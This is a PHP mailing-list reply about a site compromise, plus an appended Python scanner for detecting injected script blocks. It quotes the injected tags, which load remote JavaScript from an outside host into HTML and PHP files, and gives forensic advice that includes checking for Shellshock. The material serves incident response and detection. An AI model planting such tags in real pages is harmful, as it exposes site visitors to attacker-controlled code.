On Fri, Oct 03, 2014 at 07:54:22PM -0400, Jim Giner wrote:
> If anyone is interested here is what is being inserted into random html
> and php files:
>
> <!--f853a8--><script type="text/javascript"
> src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138"></script><!--/f853a8-->
>
> and
>
> <!--83b914--><script type="text/javascript"
> src="http://n/mytdhzzp.php?id=9625233"></script><!--/83b914-->
>

Hi Jim,

Thanks for being open and sharing this information. I'm sorry I'm late to the party. IANAE on security, but I have some experience with forensics and server administration as well as identifying attack vectors in PHP and ColdFusion and mitigating them.

Off the top of my head, this *looks* a tad like code injection via an unknown vector. By chance, are these code snippets attached to the *end* of the files that contain them?

Keep copies of the infected files, with accurate timestamps for the date of last modification. If you can obtain server access logs, it would be prudent to search them (with a "find" tool, like Unix 'grep' or the search features of your favorite editor) for the strings in the HTML comment sections, portions of the suspect URLs, etc.

Your web host will perhaps listen well if you pay them well, and the less you pay them, the less likely they are to be concerned. However, I would open a ticket and advise them of what has occurred. Ask them some questions, like what kind of security software is installed on their shared server, whether or not they monitor network traffic for suspect packets, *whether or not the server is vulnerable to "bash shell shock" (CVE-2014-6271 and CVE-2014-7169) (also known as "bashdoor")*.

If your website has *no* third-party software built in, that's good news, up to a point. It may indeed be that your code is "tough enough" and the hole was not in your code.

Given the severity of ShellShock and the fact that your server contains other people's sites as well, which may have 3rd party packages that are vulnerable, I might think rather seriously about using a VM, as others have suggested, in the future if at all feasible.

Hope this helps,

Kevin Kinsey

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
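The file search suggested in the message above, as an added example that is not part of the original thread: a Python scanner for the paired-comment script block that reports whether each block sits at the end of its file and when the file was last modified. The six-hex-digit marker pattern is generalised from the two quoted samples; `find_injections`, `scan_tree` and the sample bytes are hypothetical names and constructed data.

```python
import re
import sys
import time
from pathlib import Path

# Paired marker comments around a remote <script>, e.g. <!--f853a8--> ... <!--/f853a8-->.
# Assumption: the marker is always six hex digits, as in the two quoted samples.
INJECTION = re.compile(
    rb'<!--([0-9a-f]{6})-->\s*<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>'
    rb'\s*</script>\s*<!--/\1-->',
    re.IGNORECASE,
)
EXTENSIONS = {".html", ".htm", ".php"}

# Constructed sample (not taken from a real infected file).
SAMPLE = (b'<?php echo "ok"; ?>\n<!--a1b2c3--><script type="text/javascript" '
          b'src="http://injected.example.invalid/x.php?id=1"></script><!--/a1b2c3-->\n')


def find_injections(data):
    """Return one dict per injected block found in a file's raw bytes."""
    hits = []
    for m in INJECTION.finditer(data):
        hits.append({
            "marker": m.group(1).decode(),
            "src": m.group(2).decode("utf-8", "replace"),
            "offset": m.start(),
            # True when only whitespace follows, i.e. the block was appended.
            "at_end": data[m.end():].strip() == b"",
        })
    return hits


def scan_tree(root):
    """Scan HTML/PHP files under root; add path and last-modified time (UTC)."""
    results = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            mtime = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(path.stat().st_mtime))
            for hit in find_injections(path.read_bytes()):
                results.append({"file": str(path), "mtime_utc": mtime, **hit})
    return results


if __name__ == "__main__":
    for r in scan_tree(sys.argv[1]) if len(sys.argv) > 1 else find_injections(SAMPLE):
        print(r)
```

Run it against a copy of the web root made with timestamps preserved (for example `cp -a`), so the reported modification times are those of the infected files.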